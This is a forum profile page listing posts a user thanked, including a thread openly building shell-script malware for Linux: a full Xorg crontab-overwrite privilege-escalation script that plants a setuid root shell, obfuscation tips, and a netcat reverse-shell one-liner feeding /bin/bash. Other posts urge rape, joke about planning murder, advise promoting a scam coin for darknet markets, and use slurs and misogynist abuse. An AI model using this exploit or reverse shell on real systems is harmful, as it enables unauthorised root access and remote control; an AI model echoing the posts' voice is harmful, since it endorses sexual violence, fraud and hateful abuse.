User Controls
Posts That Were Thanked by filtration
-
2022-02-21 at 1:06 AM UTC in Fuck killing myself... I'll show her.Life stops for no one, block her.The following users say it would be alright if the author of this post didn't die in a fire!
-
2022-02-21 at 1:05 AM UTC in Fuck killing myself... I'll show her.Typical Skelmersdale whore. Forget about her, she's probably riding fresh cock or will be very soon.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-11-20 at 12:29 AM UTC in Psyop time laddos.Advertise it as a secure coin for DNM use, the trick is mass saturation before security folks have a look at it. So you're going to want to have sentiment analysis and sentiment influence tooling if you're gonna make a buck. Maltego is great for analysis, so you'll have to get creative when it comes to influencing people. But i'd be down to help if you'd like.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-21 at 11:40 PM UTC in I fucking hate devopsMe too.
It's easier than ever to deploy a web app, so what does the industry do? Complicate it.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-28 at 12:52 AM UTC in All girls are the same, they're rotting my brain, love Think I need a change before I go insane, love All girls are the same, they're rotting my brain, love Think I need a change before I go insane, loveThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-27 at 11:50 PM UTC in All girls are the same, they're rotting my brain, love Think I need a change before I go insane, love All girls are the same, they're rotting my brain, love Think I need a change before I go insane, loveLook fam you just need to learn how to set appropriate boundaries, be a little bit more discerning in who you date and perhaps learn some healthy coping mechanisms for breakups and stuff. You know i am more than happy to strategize about faking your death, doing a murder/suicide or just a murder and getting away with it, but realistically that's not really a good solution for anyone involved. It might feel just to deny someone a happy ending when that person has denied you one, but that feeling will fade and in time you'll learn that they did you a favor. Unknowingly but still.
In the end it'll be okay.
<3The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-02 at 3:05 AM UTC in God hacked my phoneNo i didn't.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-06-07 at 2:12 AM UTC in My fiancé's mum said she would lose her baby during birth, now she's sending police to my house for welfare checks because she's worried about the babyAlthough police officers are likely bound to follow up on child welfare situations. It is likely they will realize they are frivolous (if they are) and youi can inquire about a route to ensure that doesn't keep happening. It becomes a bureaucratic issue if you are able to prove youi are doing everything rightThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-06-02 at 6:59 PM UTC in this shit is pretty hardHope you're well OP, how is Skemistan.
Anyone been stabbed/ shot as of late?The following users say it would be alright if the author of this post didn't die in a fire! -
2021-03-09 at 1:40 PM UTC in Changed my setup...Hope your elevator desk breaks at a stupid height where you cant quite sit or stand at it.
More of a crouch.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-03-05 at 1:21 PM UTC in Bought one of them electric desks... Breddy dopeHow long did you spend cleaning up before filming?..and where did you hide the lotion?The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-03-05 at 1:17 PM UTC in Bought one of them electric desks... Breddy dopeThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-03-04 at 9:11 PM UTC in Ex-work said I didn't hand a usb-c adapter in and want me to invoice $100 less... should I just release their codebase?The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-18 at 8:03 PM UTC in my setupThe following users say it would be alright if the author of this post didn't die in a fire!
-
2020-12-25 at 4:10 AM UTC in My bitch wants her stupid fucking staffy to come live with out new bornRape herThe following users say it would be alright if the author of this post didn't die in a fire!
-
2020-12-25 at 1:52 AM UTC in My bitch wants her stupid fucking staffy to come live with out new bornI GUESS YOU BETTER DO A RAPE FAM!The following users say it would be alright if the author of this post didn't die in a fire!
-
2020-12-25 at 12:57 AM UTC in My bitch wants her stupid fucking staffy to come live with out new bornThe following users say it would be alright if the author of this post didn't die in a fire!
-
2020-11-19 at 11:21 PM UTC in These fancy fucking words piss me offit's not so much the words, it's how autistic retards shoehorn them in where they don't belong because they think it makes their writing seem more authoritativeThe following users say it would be alright if the author of this post didn't die in a fire!
-
2020-11-13 at 5:03 AM UTC in Github workflows are temperamental as fuckcan u also ban filtration for his obscene profanityThe following users say it would be alright if the author of this post didn't die in a fire!
